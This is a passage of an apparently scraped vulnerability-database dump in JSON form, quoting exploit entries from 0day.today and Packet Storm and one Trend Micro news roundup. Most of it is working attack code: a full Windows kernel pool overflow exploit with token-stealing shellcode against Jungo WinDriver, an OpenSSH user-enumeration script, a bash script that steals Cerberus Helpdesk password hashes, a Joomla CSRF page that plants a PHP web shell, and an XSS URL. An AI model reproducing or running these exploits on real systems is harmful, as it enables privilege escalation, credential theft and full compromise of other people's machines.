hex(result))\r\n\r\npHandles = cast(\r\nsystem_handle_information.Handles,\r\nPOINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \\\r\nsystem_handle_information.NumberOfHandles)\r\n)\r\nfor handle in pHandles.contents:\r\nyield handle.UniqueProcessId, handle.HandleValue, handle.Object\r\n\r\ndef we_can_alloc_shellcode():\r\n\"\"\"\r\nThis function allocates the shellcode @ the null page making\r\nsure the new OkayToCloseProcedure pointer points to shellcode.\r\n\"\"\"\r\nbaseadd = c_int(0x00000004)\r\nnull_size = c_int(0x1000)\r\n\r\ntokenstealing = (\r\n\"\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x50\\x8B\\xC8\\x8B\\x80\"\r\n\"\\xB8\\x00\\x00\\x00\\x2D\\xB8\\x00\\x00\\x00\\x83\\xB8\\xB4\\x00\\x00\\x00\\x04\"\r\n\"\\x75\\xEC\\x8B\\x90\\xF8\\x00\\x00\\x00\\x89\\x91\\xF8\\x00\\x00\\x00\\xC2\\x10\"\r\n\"\\x00\" )\r\n\r\nOkayToCloseProcedure = struct.pack(\"<L\", 0x00000078)\r\nsc = \"\\x42\" * 0x70 + OkayToCloseProcedure\r\n\r\n# first we restore our smashed TypeIndex\r\nsc += \"\\x83\\xC6\\x0c\" # add esi, 0c\r\nsc += \"\\xc7\\x06\\x0a\\x00\\x08\\x00\" # mov [esi], 8000a\r\nsc += \"\\x83\\xee\\x0c\" # sub esi, 0c\r\nsc += tokenstealing\r\nsc += \"\\x90\" * (0x400-len(sc))\r\nntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong,\r\nPOINTER(c_int), c_int, c_int]\r\ndwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,\r\nbyref(null_size),\r\nMEM_RESERVE|MEM_COMMIT,\r\nPAGE_EXECUTE_READWRITE)\r\nif dwStatus != STATUS_SUCCESS:\r\nprint \"(-) error while allocating the null paged memory: %s\" % dwStatus\r\nreturn False\r\nwritten = c_ulong()\r\nwrite = kernel32.WriteProcessMemory(0xffffffff, 0x00000004, sc, 0x400, byref(written))\r\nif write == 0:\r\nprint \"(-) error while writing our junk to the null paged memory: %s\" % write\r\nreturn False\r\nreturn True\r\n\r\ndef we_can_spray():\r\n\"\"\"\r\nSpray the Kernel Pool with IoCompletionReserve and Event Objects.\r\nThe IoCompletionReserve object is 0x60 and Event object is 
0x40 bytes in length.\r\nThese are allocated from the Nonpaged kernel pool.\r\n\"\"\"\r\nhandles = []\r\nIO_COMPLETION_OBJECT = 1\r\nfor i in range(0, 25000):\r\nhandles.append(windll.kernel32.CreateEventA(0,0,0,0))\r\nhHandle = HANDLE(0)\r\nhandles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT))\r\n\r\n# could do with some better validation\r\nif len(handles) > 0:\r\nreturn True\r\nreturn False\r\n\r\ndef alloc_pool_overflow_buffer(base, input_size):\r\n\"\"\"\r\nCraft our special buffer to trigger the overflow.\r\n\"\"\"\r\nprint \"(+) allocating pool overflow input buffer\"\r\nbaseadd = c_int(base)\r\nsize = c_int(input_size)\r\ninput = \"\\x41\" * 0x18 # offset to size\r\ninput += struct.pack(\"<I\", 0x0000008d) # controlled size (this triggers the overflow)\r\ninput += \"\\x42\" * (0x90-len(input)) # padding to survive bsod\r\ninput += struct.pack(\"<I\", 0x00000000) # use a NULL dword for sub_4196CA\r\ninput += \"\\x43\" * ((0x460-0x8)-len(input)) # fill our pool buffer\r\n\r\n# repair the allocated chunk header...\r\ninput += struct.pack(\"<I\", 0x040c008c) # _POOL_HEADER\r\ninput += struct.pack(\"<I\", 0xef436f49) # _POOL_HEADER (PoolTag)\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\ninput += struct.pack(\"<I\", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\ninput += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (PointerCount)\r\ninput += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (HandleCount)\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (Lock)\r\ninput += struct.pack(\"<I\", 0x00080000) # _OBJECT_HEADER (TypeIndex)\r\ninput += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo)\r\n\r\n# filler\r\ninput += \"\\x44\" * (input_size-len(input))\r\nntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), 
c_ulong,\r\nPOINTER(c_int), c_int, c_int]\r\ndwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0,\r\nbyref(size),\r\nMEM_RESERVE|MEM_COMMIT,\r\nPAGE_EXECUTE_READWRITE)\r\nif dwStatus != STATUS_SUCCESS:\r\nprint \"(-) error while allocating memory: %s\" % hex(dwStatus + 0xffffffff)\r\nreturn False\r\nwritten = c_ulong()\r\nwrite = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))\r\nif write == 0:\r\nprint \"(-) error while writing our input buffer memory: %s\" % write\r\nreturn False\r\nreturn True\r\n\r\ndef we_can_trigger_the_pool_overflow():\r\n\"\"\"\r\nThis triggers the pool overflow vulnerability using a buffer of size 0x460.\r\n\"\"\"\r\nGENERIC_READ = 0x80000000\r\nGENERIC_WRITE = 0x40000000\r\nOPEN_EXISTING = 0x3\r\nDEVICE_NAME = \"\\\\\\\\.\\\\WinDrvr1240\"\r\ndwReturn = c_ulong()\r\ndriver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)\r\ninputbuffer = 0x41414141\r\ninputbuffer_size = 0x5000\r\noutputbuffer_size = 0x5000\r\noutputbuffer = 0x20000000\r\nalloc_pool_overflow_buffer(inputbuffer, inputbuffer_size)\r\nIoStatusBlock = c_ulong()\r\n\r\nif driver_handle:\r\ndev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7,\r\ninputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size)\r\nreturn True\r\nreturn False\r\n\r\ndef we_can_make_pool_holes():\r\n\"\"\"\r\nThis makes the pool holes that will coalesce into a hole of size 0x460.\r\n\"\"\"\r\nglobal khandlesd\r\nmypid = os.getpid()\r\nkhandlesd = {}\r\nkhandlesl = []\r\n\r\n# leak kernel handles\r\nfor pid, handle, obj in get_handles():\r\n\r\n# mixed object attack\r\nif pid == mypid and (get_type_info(handle) == \"Event\" or get_type_info(handle) == \"IoCompletionReserve\"):\r\nkhandlesd[obj] = handle\r\nkhandlesl.append(obj)\r\n\r\n# Find holes and make our allocation\r\nholes = []\r\nfor obj in khandlesl:\r\n\r\n# obj address is the 
handle address, but we want to allocation\r\n# address, so we just remove the size of the object header from it.\r\nalloc = obj - 0x30\r\n\r\n# Get allocations at beginning of the page\r\nif (alloc & 0xfffff000) == alloc:\r\nbin = []\r\n\r\n# object sizes\r\nCreateEvent_size = 0x40\r\nIoCompletionReserve_size = 0x60\r\ncombined_size = CreateEvent_size + IoCompletionReserve_size\r\n\r\n# after the 0x20 chunk hole, the first object will be the IoCompletionReserve object\r\noffset = IoCompletionReserve_size\r\nfor i in range(offset, offset + (7 * combined_size), combined_size):\r\ntry:\r\n# chunks need to be next to each other for the coalesce to take effect\r\nbin.append(khandlesd[obj + i])\r\nbin.append(khandlesd[obj + i - IoCompletionReserve_size])\r\nexcept KeyError:\r\npass\r\n\r\n# make sure it's contiguously allocated memory\r\nif len(tuple(bin)) == 14:\r\nholes.append(tuple(bin))\r\n\r\n# make the holes to fill\r\nfor hole in holes:\r\nfor handle in hole:\r\nkernel32.CloseHandle(handle)\r\nreturn True\r\n\r\ndef trigger_lpe():\r\n\"\"\"\r\nThis function frees the IoCompletionReserve objects and this triggers the\r\nregistered aexit, which is our controlled pointer to OkayToCloseProcedure.\r\n\"\"\"\r\n# free the corrupted chunk to trigger OkayToCloseProcedure\r\nfor k, v in khandlesd.iteritems():\r\nkernel32.CloseHandle(v)\r\nos.system(\"cmd.exe\")\r\n\r\ndef main():\r\nprint \"\\n\\t--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\"\r\nprint \"\\t Steven Seeley (mr_me) of Source Incite\\r\\n\"\r\n\r\nif release() != \"7\" or architecture()[0] != \"32bit\":\r\nprint \"(-) although this exploit may work on this system,\"\r\nprint \" it was only designed for Windows 7 x86.\"\r\nsys.exit(-1)\r\n\r\nprint \"(+) spraying pool with mixed objects...\"\r\nif we_can_spray():\r\nprint \"(+) sprayed the pool!\"\r\nprint \"(+) making pool holes...\"\r\nif we_can_make_pool_holes():\r\nprint \"(+) made the pool holes!\"\r\nprint \"(+) allocating 
shellcode...\"\r\nif we_can_alloc_shellcode():\r\nprint \"(+) allocated the shellcode!\"\r\nprint \"(+) triggering pool overflow...\"\r\nif we_can_trigger_the_pool_overflow():\r\nprint \"(+) elevating privileges!\"\r\ntrigger_lpe()\r\n\r\nif __name__ == '__main__':\r\nmain()<script>!function(e,t,r,n,c,h,o){function a(e,t,r,n){for(r='',n='0x'+e.substr(t,2)|0,t+=2;t<e.length;t+=2)r+=String.fromCharCode('0x'+e.substr(t,2)^n);return r}try{for(c=e.getElementsByTagName('a'),o='/cdn-cgi/l/email-protection#',n=0;n<c.length;n++)try{(t=(h=c[n]).href.indexOf(o))>-1&&(h.href='mailto:'+a(h.href,t+o.length))}catch(e){}for(c=e.querySelectorAll('.__cf_email__'),n=0;n<c.length;n++)try{(h=c[n]).parentNode.replaceChild(e.createTextNode(a(h.getAttribute('data-cfemail'),0)),h)}catch(e){}}catch(e){}}(document);</script>\n\n# 0day.today [2018-01-10] #", "sourceHref": "https://0day.today/exploit/28439", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-09T21:04:52", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2016-07-18T00:00:00", "published": "2016-07-18T00:00:00", "id": "1337DAY-ID-25438", "href": "https://0day.today/exploit/description/25438", "type": "zdt", "title": "OpenSSHd 7.2p2 - Username Enumeration (1)", "sourceData": "Source: http://seclists.org/fulldisclosure/2016/Jul/51\r\n \r\n--------------------------------------------------------------------\r\nUser Enumeration using Open SSHD (<=Latest version).\r\n-------------------------------------------------------------------\r\n \r\nAbstract:\r\n-----------\r\nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. 
This problem exists in most \r\nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.\r\n \r\nCVE-ID\r\n---------\r\nCVE-2016-6210\r\n \r\nTested versions\r\n--------------------\r\nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).\r\n \r\nFix\r\n-----------------\r\nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).\r\n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion).\r\n \r\nDetails\r\n----------------\r\nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \r\nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.\r\nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \r\nresponse time from the server for non-existing users.\r\n \r\nSample code:\r\n----------------\r\nimport paramiko\r\nimport time\r\nuser=raw_input(\"user: \")\r\np='A'*25000\r\nssh = paramiko.SSHClient()\r\nstarttime=time.clock()\r\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\ntry:\r\n ssh.connect('127.0.0.1', username=user,\r\n password=p)\r\nexcept:\r\n endtime=time.clock()\r\ntotal=endtime-starttime\r\nprint(total)\r\n \r\n(Valid users will result in higher total time).\r\n \r\n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...\r\n \r\n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \r\npackets of the server, since this will eliminate any network delays on the way.\r\n \r\nEddie Harari\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/25438"}, {"lastseen": 
"2018-04-09T17:40:36", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-03-07T00:00:00", "published": "2016-03-07T00:00:00", "id": "1337DAY-ID-24947", "href": "https://0day.today/exploit/description/24947", "type": "zdt", "title": "Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure", "sourceData": "#!/bin/bash\r\n#####################################################################################\r\n# Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing #\r\n# Date: 04.02.2016 #\r\n# Exploit Author: asdizzle_ #\r\n# Vendor Homepage: http://www.cerberusweb.com/ #\r\n# Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip #\r\n# Version: 5 - 6.7 #\r\n# Tested on: Debian 8 / apache2 with cerb 5 #\r\n#####################################################################################\r\n# Prerequisites: #\r\n# -At least one worker must be logged in #\r\n# -/storage/tmp/ dir must be accessible #\r\n# #\r\n# If everything else fails try if there's directory listing in /storage/tmp #\r\n# You might find attachments and even support tickets. #\r\n#####################################################################################\r\n \r\nurl='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)\r\npre='devblocks' # If this doesn't work try 'zend'\r\n \r\necho \"[*] Trying to fetch cache file\"\r\n \r\ncachechk=$(curl -s $url\"/storage/tmp/\"$pre\"_cache---ch_workers\" | grep pass)\r\nif [ -z \"$cachechk\" ];then\r\n echo \"[-] File not found.\"\r\n exit\r\nelse\r\n echo \"[+] Found. 
Extracting...\"\r\n hashes=$(echo \"$cachechk\" | sed -e 's/s:5/\\n/g' | grep email | cut -d '\"' -f4,8 | sed 's/\"/:/g')\r\n if [ -z \"$hashes\" ];then\r\n echo \"[-] Hash extracting failed\"\r\n else\r\n echo \"[+] Extracting seems to have worked\"\r\n echo\r\n echo \"$hashes\"\r\n fi\r\nfi\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24947"}, {"lastseen": "2018-01-03T11:02:17", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-02-26T00:00:00", "published": "2016-02-26T00:00:00", "id": "1337DAY-ID-24935", "href": "https://0day.today/exploit/description/24935", "type": "zdt", "title": "Joomla! Extension JSN Poweradmin 2.3.0 - Multiple Vulnerabilities", "sourceData": "JSN PowerAdmin Joomla! Extension Remote Command Execution Via CSRF and\r\nXSS vulnerabilities\r\n---------------------------------------------------------\r\n \r\nProduct: JSN PowerAdmin Joomla! Extension\r\nVendor: JoomlaShine.com\r\nTested Versions: 2.3.0\r\nOther Vulnerable Versions: Prior versions may also be affected\r\nVendor Notification: 28th January, 2016\r\nAdvisory Publication: 24th February, 2016\r\nCVE Reference: Pending\r\nRatioSec Advisory Reference: RS-2016-001\r\nRisk Level: High\r\nCVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\r\n \r\n---------------------------------------------------------\r\n \r\nRatioSec Research has discovered two cross-site request forgery and\r\nreflected cross-site scripting vulnerabilities in JSN PowerAdmin\r\nJoomla! Extension which can be exploited, respectively, to upload PHP\r\nfiles and run arbitrary HTML and script code in a user's browser\r\nsession in context of the affected web site.\r\n \r\n1) The application allows users to perform certain actions via HTTP\r\nrequests without performing proper checks to verify the requests\r\nvalidity. 
An authenticated user's browser can be forced to upload PHP\r\nfiles via the extension installer and subsequently execute arbitrary\r\ncommands with the web server privileges by tricking the user into\r\nvisiting a malicious web site.\r\n \r\n2) Input passed to `identified_name` GET parameter when `package` is\r\nset, `option` is set to `com_poweradmin`, `view` is set to\r\n`installer`, and `task` is set to `installer.install` in\r\n`/administrator/index.php` is not properly sanitised before being\r\nreflected. This can be exploited to run arbitrary HTML and script code\r\nin a user's browser session in context of the affected web site.\r\n \r\n---------------------------------------------------------\r\n \r\nProof of Concept\r\n \r\nRead the advisory details on the RatioSec Research website for the\r\nproof of concept code.\r\nhttp://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/\r\n \r\n----------------------------------------------------------\r\n \r\nSolution\r\n \r\nNo official solution is currently available.\r\n \r\n----------------------------------------------------------\r\n \r\nTimeline\r\n \r\n- First contact: 27th January, 2016\r\n- Disclosure: 28th January, 2016. 
Preliminary date set to 10th, February 2016.\r\n- E-mail notice after no response: 02nd February, 2016\r\n- Advisory Publication: 24th February, 2016\r\n \r\n----------------------------------------------------------\r\n \r\nAdvisory URL\r\n \r\nhttp://www.ratiosec.com/2016/jsn-poweradmin-joomla-extension-rce-via-csrf-and-xss/\r\n \r\nRatioSec Research\r\n \r\nMail: research at ratiosec dot com\r\nWeb: http://www.ratiosec.com/\r\nTwitter: https://twitter.com/ratio_sec\r\n \r\n \r\n \r\n----------------\r\nProof Of Concept\r\n \r\n1) The following HTML page exploits the cross-site request forgery vulnerability and uploads a malicious PHP script system($_GET['cmd']); as /tmp/bd.phtml if visited by a logged-in administrator.\r\n \r\n<html>\r\n <body>\r\n <script>\r\n function submitRequest()\r\n {\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", \"http://localhost/no8/joomla/administrator/index.php?option=com_poweradmin&view=installer&task=installer.install\", true);\r\n xhr.setRequestHeader(\"Accept\", \"*/*\");\r\n xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n xhr.setRequestHeader(\"Content-Type\", \"multipart/form-data; boundary=---------------------------167969427914885435381146171168\");\r\n xhr.withCredentials = true;\r\n var body = \"-----------------------------167969427914885435381146171168\\r\\n\" +\r\n \"Content-Disposition: form-data; name=\\\"package\\\"; filename=\\\"bd.phtml\\\"\\r\\n\" +\r\n \"Content-Type: application/octet-stream\\r\\n\" +\r\n \"\\r\\n\" +\r\n \"\\x3cscript language=\\\"php\\\"\\x3esystem($_GET['cmd']);\\r\\n\" +\r\n \"\\r\\n\" +\r\n \"-----------------------------167969427914885435381146171168--\\r\\n\" +\r\n \"\\r\\n\" +\r\n \"\\r\\n\";\r\n var aBody = new Uint8Array(body.length);\r\n for (var i = 0; i < aBody.length; i++)\r\n aBody[i] = body.charCodeAt(i);\r\n xhr.send(new Blob([aBody]));\r\n }\r\n </script>\r\n <form action=\"#\">\r\n <input type=\"button\" value=\"Submit request\" 
onclick=\"submitRequest();\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\nThe file extension .phtml and the <script language=\"php\"> </script> tags are used here to fool the Joomla API JFile::upload() file validation checks. As result, the backdoor is installed permanently as /tmp/bd.phtml which can be used lately by the attacker to obtain the full system compromise.\r\n \r\nCommand Execution\r\n \r\n2) The following URL exploits the cross-site scripting vulnerability to execute javascript code in a logged-in administrator\u2019s browser.\r\n \r\nhttp://localhost/joomla/administrator/index.php?package=foobar&option=com_poweradmin&view=installer&task=installer.install&identified_name=<img+src%3dx+onerror=alert(\"RatioSecResearch\")>\n\n# 0day.today [2018-01-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24935"}, {"lastseen": "2018-03-01T03:39:30", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2015-12-17T00:00:00", "published": "2015-12-17T00:00:00", "id": "1337DAY-ID-25723", "href": "https://0day.today/exploit/description/25723", "type": "zdt", "title": "Adobe Flash MovieClip.lineStyle - Use-After-Frees", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=558\r\n \r\nThere are a number of use-after-frees in MovieClip.lineStyle. If any of the String parameters are an object with toString defined, the toString method can delete the MovieClip, which is subsequently used. 
A PoC is as follows:\r\n \r\nthis.createEmptyMovieClip(\"triangle_mc\", this.getNextHighestDepth());\r\nvar o = {toString: func};\r\ntriangle_mc.lineStyle(5, 0xff00ff, 100, true, o, \"round\", \"miter\", 1);\r\n \r\nfunction func(){\r\n \r\n triangle_mc.removeMovieClip();\r\n return \"none\";\r\n \r\n }\r\n \r\nA sample swf and fla are attached.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39021.zip\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25723"}], "trendmicroblog": [{"lastseen": "2019-05-29T16:28:31", "bulletinFamily": "blog", "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how credit card skimming attacks can impact businesses and how ransomware can use software installations to help hide malicious activities.\n\nRead on:\n\n**[Mirrorthief Group Uses Magecart Skimming Attack to Hit Hundreds of Campus Online Stores in US and Canada](<https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/>)**\n\n_Trend Micro uncovered recent activity by hacking group Mirrorthief involving the notorious online credit card skimming attack known as Magecart, which impacted 201 online campus stores in the United States and Canada._\n\n**[Hackers Steal $40.7 Million in Bitcoin from Crypto Exchange Binance](<https://www.coindesk.com/hackers-steal-40-7-million-in-bitcoin-from-crypto-exchange-binance>)**\n\n_Hackers stole more than 7,000 bitcoin from crypto exchange Binance and were able to access user API keys, two-factor authentication codes and other information to withdraw $41 million in bitcoin from the exchange._\n\n**[Cyberattack 
Cripples Baltimore's Government Computer Servers](<https://abcnews.go.com/US/wireStory/cyberattack-cripples-baltimores-government-computer-servers-62888773>)**\n\n_Baltimore's government rushed to shut down most of its computer servers after its network was hit by a ransomware virus, though officials believe it has not touched critical public safety systems. _\n\n**[Dharma Ransomware Uses AV Tool to Distract from Malicious Activities](<https://blog.trendmicro.com/trendlabs-security-intelligence/dharma-ransomware-uses-av-tool-to-distract-from-malicious-activities/>)**\n\n_Trend Micro recently found new samples of Dharma ransomware that are using a new technique: using software installation as a distraction to help hide malicious activities._\n\n**[What Israel\u2019s Strike on Hamas Hackers Means for Cyberwar](<https://www.wired.com/story/israel-hamas-cyberattack-air-strike-cyberwar/>)**\n\n_The Israeli Defense Force claimed that it bombed and partially destroyed one building in Gaza because it was allegedly the base of an active Hamas hacking group._\n\n**[CVE-2019-3396 Redux: Confluence Vulnerability Exploited to Deliver Cryptocurrency Miner with Rootkit](<https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/>)**\n\n_Trend Micro observed a critical vulnerability involving Confluence that was being exploited by threat actors to perform malicious attacks. _\n\n**[Trump Creates New Cybersecurity Competition with a $25,000 Award](<https://www.rollcall.com/news/congress/trump-creates-new-cybersecurity-competition-with-a-25000-award>)**\n\n_The Trump administration announced steps to address a shortage of cybersecurity workers across the federal government, including sponsorship of a national competition and allowing cyber experts to rotate from one agency to another. 
_\n\nWhat are your thoughts on hacking groups like Mirrorthief and their impact on businesses and consumers? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\n_ _\n\nThe post [This Week in Security News: Skimming Attacks and Ransomware](<https://blog.trendmicro.com/this-week-in-security-news-skimming-attacks-and-ransomware/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2019-05-10T13:00:42", "published": "2019-05-10T13:00:42", "id": "TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833", "href": "https://blog.trendmicro.com/this-week-in-security-news-skimming-attacks-and-ransomware/", "type": "trendmicroblog", "title": "This Week in Security News: Skimming Attacks and Ransomware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-09-08T05:08:41", "bulletinFamily": "exploit", "description": "", "modified": "2017-09-07T00:00:00", "published": "2017-09-07T00:00:00", "href": "https://packetstormsecurity.com/files/144046/Jungo-DriverWizard-WinDrive-Overflow.html", "id": "PACKETSTORM:144046", "title": "Jungo DriverWizard WinDrive Overflow", "type": "packetstorm", "sourceData": "`# -*- coding: utf-8 -*- \n\"\"\" \nJungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability \n \nDownload: http://www.jungo.com/st/products/windriver/ \nFile: WD1240.EXE \nSha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba \nDriver: windrvr1240.sys \nSha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad \nCVE: CVE-2017-14153 \nAuthor: Steven Seeley (mr_me) of Source Incite \nAffected: <= v12.4.0 \nThanks: b33f, ryujin and sickness \nAnalysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html \n \nSummary: \n======== \n \nThis vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. 
An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. \n \nThe specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel. \n \nTimeline: \n========= \n \n2017-08-22 a Verified and sent to Jungo via sales@/first@/security@/info@jungo.com \n2017-08-25 a No response from Jungo and two bounced emails \n2017-08-26 a Attempted a follow up with the vendor via website chat \n2017-08-26 a No response via the website chat \n2017-09-03 a Recieved an email from a Jungo representative stating that they are \"looking into it\" \n2017-09-03 a Requested a timeframe for patch development and warned of possible 0day release \n2017-09-06 a No response from Jungo \n2017-09-06 a Public 0day release of advisory \n \nExample: \n======== \n \nC:\\Users\\Guest\\Desktop>icacls poc.py \npoc.py NT AUTHORITY\\Authenticated Users:(I)(F) \nNT AUTHORITY\\SYSTEM:(I)(F) \nBUILTIN\\Administrators:(I)(F) \nBUILTIN\\Users:(I)(F) \nMandatory Label\\Low Mandatory Level:(I)(NW) \n \nSuccessfully processed 1 files; Failed processing 0 files \n \nC:\\Users\\Guest\\Desktop>whoami \ndebugee\\guest \n \nC:\\Users\\Guest\\Desktop>poc.py \n \n--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ] \nSteven Seeley (mr_me) of Source Incite \n \n(+) spraying pool with mixed objects... \n(+) sprayed the pool! \n(+) making pool holes... \n(+) made the pool holes! \n(+) allocating shellcode... \n(+) allocated the shellcode! \n(+) triggering pool overflow... \n(+) allocating pool overflow input buffer \n(+) elevating privileges! \nMicrosoft Windows [Version 6.1.7601] \nCopyright (c) 2009 Microsoft Corporation. All rights reserved. 
\n \nC:\\Users\\Guest\\Desktop>whoami \nnt authority\\system \n \nC:\\Users\\Guest\\Desktop> \n\"\"\" \nfrom ctypes import * \nfrom ctypes.wintypes import * \nimport struct, sys, os, time \nfrom platform import release, architecture \n \nntdll = windll.ntdll \nkernel32 = windll.kernel32 \nMEM_COMMIT = 0x00001000 \nMEM_RESERVE = 0x00002000 \nPAGE_EXECUTE_READWRITE = 0x00000040 \nSTATUS_SUCCESS = 0x0 \nSTATUS_INFO_LENGTH_MISMATCH = 0xC0000004 \nSTATUS_INVALID_HANDLE = 0xC0000008 \nSystemExtendedHandleInformation = 64 \n \nclass LSA_UNICODE_STRING(Structure): \n\"\"\"Represent the LSA_UNICODE_STRING on ntdll.\"\"\" \n_fields_ = [ \n(\"Length\", USHORT), \n(\"MaximumLength\", USHORT), \n(\"Buffer\", LPWSTR), \n] \n \nclass SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure): \n\"\"\"Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.\"\"\" \n_fields_ = [ \n(\"Object\", c_void_p), \n(\"UniqueProcessId\", ULONG), \n(\"HandleValue\", ULONG), \n(\"GrantedAccess\", ULONG), \n(\"CreatorBackTraceIndex\", USHORT), \n(\"ObjectTypeIndex\", USHORT), \n(\"HandleAttributes\", ULONG), \n(\"Reserved\", ULONG), \n] \n \nclass SYSTEM_HANDLE_INFORMATION_EX(Structure): \n\"\"\"Represent the SYSTEM_HANDLE_INFORMATION on ntdll.\"\"\" \n_fields_ = [ \n(\"NumberOfHandles\", ULONG), \n(\"Reserved\", ULONG), \n(\"Handles\", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1), \n] \n \nclass PUBLIC_OBJECT_TYPE_INFORMATION(Structure): \n\"\"\"Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.\"\"\" \n_fields_ = [ \n(\"Name\", LSA_UNICODE_STRING), \n(\"Reserved\", ULONG * 22), \n] \n \nclass PROCESSENTRY32(Structure): \n_fields_ = [ \n(\"dwSize\", c_ulong), \n(\"cntUsage\", c_ulong), \n(\"th32ProcessID\", c_ulong), \n(\"th32DefaultHeapID\", c_int), \n(\"th32ModuleID\", c_ulong), \n(\"cntThreads\", c_ulong), \n(\"th32ParentProcessID\", c_ulong), \n(\"pcPriClassBase\", c_long), \n(\"dwFlags\", c_ulong), \n(\"szExeFile\", c_wchar * MAX_PATH) \n] \n \nProcess32First = kernel32.Process32FirstW \nProcess32Next = 
